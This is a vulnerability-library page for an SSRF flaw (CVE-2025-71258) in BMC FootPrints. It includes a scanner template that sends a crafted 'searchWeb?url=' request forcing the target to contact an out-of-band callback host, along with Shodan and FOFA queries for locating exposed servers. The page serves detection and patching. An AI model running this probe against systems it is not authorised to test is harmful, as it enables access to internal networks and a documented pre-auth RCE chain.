/Vulnerability Library

BMC FootPrints 'searchWeb' - Server-Side Request Forgery

CVE-2025-71258
Verified

Description

BMC FootPrints versions 20.20.02 through 20.24.01.001 contain a Server-Side Request Forgery (SSRF) vulnerability in the /footprints/servicedesk/import/searchWeb endpoint. The 'url' parameter allows unauthenticated attackers to force the server to make HTTP requests to arbitrary URLs, enabling access to internal services and bypassing firewall restrictions. This vulnerability is part of a pre-authenticated RCE chain when combined with CVE-2025-71257 (auth bypass) and CVE-2025-71260 (deserialization).

Severity

High

CVSS Score

8.6

Exploit Probability

2%

Affected Product

footprints

Published Date

March 18, 2026

Template Author

watchtowr, dhiyaneshdk

CVE-2025-71258.yaml
id: CVE-2025-71258

info:
  name: BMC FootPrints 'searchWeb' - Server-Side Request Forgery
  author: watchTowr,DhiyaneshDk
  severity: high
  description: |
    BMC FootPrints versions 20.20.02 through 20.24.01.001 contain a Server-Side Request Forgery (SSRF) vulnerability in the /footprints/servicedesk/import/searchWeb endpoint. The 'url' parameter allows unauthenticated attackers to force the server to make HTTP requests to arbitrary URLs, enabling access to internal services and bypassing firewall restrictions. This vulnerability is part of a pre-authenticated RCE chain when combined with CVE-2025-71257 (auth bypass) and CVE-2025-71260 (deserialization).
  impact: |
    Authenticated attackers can cause the server to make arbitrary outbound requests, potentially impacting system availability and internal network security.
  remediation: |
    Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2025-71258
    epss-score: 0.0163
    epss-percentile: 0.8212
    cwe-id: CWE-918
  reference:
    - https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/
    - https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"BMC Software"
    product: footprints
    vendor: bmc
    fofa-query: body="/footprints/servicedesk/"
  tags: cve,cve2025,servicedesk,bmc-software,ssrf,oast,oob,footprints,bmc

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(set_cookie, "SEC_TOKEN=")
        internal: true

  - raw:
      - |
        GET /footprints/servicedesk/import/searchWeb?url=http://{{interactsh-url}}&dataEncoding=x HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns
# digest: 4a0a00473045022100889e7f66928786cda19ae5992fad86f20e920b2e30ce1277f5984723f86a035402207cc8c44d4d938212e8b2658613237f5e001dea1bc54cdb1e67b9b2af355774a1:922c64590222798bb761d5b6d8e72950
8.6Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CVE ID:
cve-2025-71258
CWE ID:
cwe-918

References

https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/

Remediation Steps

Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.